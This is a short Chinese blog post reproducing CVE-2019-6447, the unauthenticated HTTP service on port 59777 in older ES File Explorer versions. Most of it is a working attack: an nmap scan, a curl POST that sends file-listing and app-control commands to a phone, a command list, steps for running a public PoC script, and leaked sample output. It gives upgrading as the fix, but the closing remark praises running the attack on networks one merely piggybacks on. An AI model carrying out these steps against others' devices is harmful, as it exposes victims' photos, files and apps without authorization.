ES文件管理器未授权访问漏洞——CVE-2019-6447

ES文件管理器号称安卓文件管理器第一品牌,主动下载达3亿次,作者我也在用。
每次用户启动应用时都会启动http服务器,打开的本地端口为59777,直接访问会弹出权限被拒绝
ES文件管理器未授权访问漏洞——CVE-2019-6447
漏洞影响范围
ES文件管理器版本号4.1.9.7.4或者更低
漏洞复现
直接nmap扫描手机指定端口
nmap 192.168.0.108 59777
ES文件管理器未授权访问漏洞——CVE-2019-6447
可以看到端口是已经开启的
我们可以直接curl也可以进行复现
curl命令:curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://192.168.0.108:59777
listPics可以替换成想要使用的命令
可用命令
listFiles:列出所有文件
listPics:列出所有的图片
listVideos:列出所有视频
listAudios:列出所有的音频文件
listApps:列出所有已安装的应用
listAppsSystem:列出所有系统应用
listAppsPhone:列出所有电话应用程序
listAppsSdcard:列出sdcard中所有的apk文件
listAppsAll :列出所有已安装的应用(包括系统应用)
getDeviceInfo:获取设备信息
appPull :从设备中提取应用,需要包名称参数
appLaunch:启动应用程序,需要包名称参数
getAppThumbnail:获取应用程序的图标,需要包名称参数
上处命令位置为包路径下的4.1.84class2.-dex2jar.jar\com\estrongs\android\f\a.class
ES文件管理器未授权访问漏洞——CVE-2019-6447
poc脚本
git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
pip install -r requirements.txt
python poc.py --cmd listPics --ip 192.168.0.108(listPics也可以替换自己要使用的命令)
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }(出现此内容为复现成功)

更新最新版es文件管理器即可修复(低于4.1.9.9的版本需尽快升级为最新版)

ps:配合linuxdeploy在手机上部署kali环境简直无敌,只需要蹭下网就odkk了

猜你喜欢

转载自blog.51cto.com/superwolf/2347574
今日推荐